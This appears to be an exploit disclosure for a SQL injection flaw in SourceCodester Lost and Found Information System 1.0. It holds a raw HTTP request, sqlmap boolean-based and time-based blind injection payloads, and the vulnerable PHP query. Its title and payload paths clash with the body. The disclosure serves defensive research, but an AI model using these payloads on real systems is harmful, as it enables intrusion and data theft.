Exploit Title: SOURCECODESTER LOST AND FOUND INFORMATION SYSTEM 1.0 GET PARAMETER ITEMS/VIEW.PHP ID SQL INJECTION
A vulnerability was found in SourceCodester Lost and Found Information System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file admin/?page=categories/view_category of the component GET Parameter Handler. The manipulation of the argument id leads to sql injectio
12 May 2023
tht1997
v 1.0
/admin/?page=categories/view_category&id=
A vulnerability was found in SourceCodester Lost and Found Information System 1.0. It has been classified as critical. This affects some unknown processing of the file admin/?page=categories/view_category of the component GET Parameter Handler. The manipulation of the argument id with an unknown input leads to a sql injection vulnerability. CWE is classifying the issue as CWE-89. The software constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. This is going to have an impact on confidentiality, integrity, and availability.
Following steps are involved:
- Visit the vulnerable page: /php-lfis/admin/?page=categories/view_category&id=2
- Copy request to a txt file and run with SQLmap Request
GET /php-lfis/admin/?page=categories/view_category&id=2 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://localhost/php-lfis/admin/?page=categories
Cookie: remember_me_name=bMGFrQaFzDhuoLmztZCT; remember_me_pwd=YMSm3Q2wFDHaHLQ5eZPKc42oU7CaK8IlA%40q1; remember_me_lang=en; Hm_lvt_c790ac2bdc2f385757ecd0183206108d=1680329430; Hm_lvt_5320b69f4f1caa9328dfada73c8e6a75=1680329567; PowerBB_username=xss; PowerBB_password=8879f85d0170cba2a4328bbb5a457c6a; menu_contracted=false; __atuvc=1%7C16; PHPSESSID=kt5sfckl2e0fle94p3bdha9n45
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
- Result
---
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: page=categories/manage_category&id=2' AND 9413=9413 AND 'OfUY'='OfUY
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: page=categories/manage_category&id=2' AND (SELECT 1200 FROM (SELECT(SLEEP(5)))pTou) AND 'jydD'='jydD
---
- CODE VULNERABLE
<?php
if(isset($_GET['id']) && $_GET['id'] > 0){
$qry = $conn->query("SELECT * from `category_list` where id = '{$_GET['id']}' ");
if($qry->num_rows > 0){
foreach($qry->fetch_assoc() as $k => $v){
$$k=$v;
}
}else{
echo '<script>alert("Category ID is not valid."); location.replace("./?page=categories")</script>';
}
}else{
echo '<script>alert("Category ID is Required."); location.replace("./?page=categories")</script>';
}
?>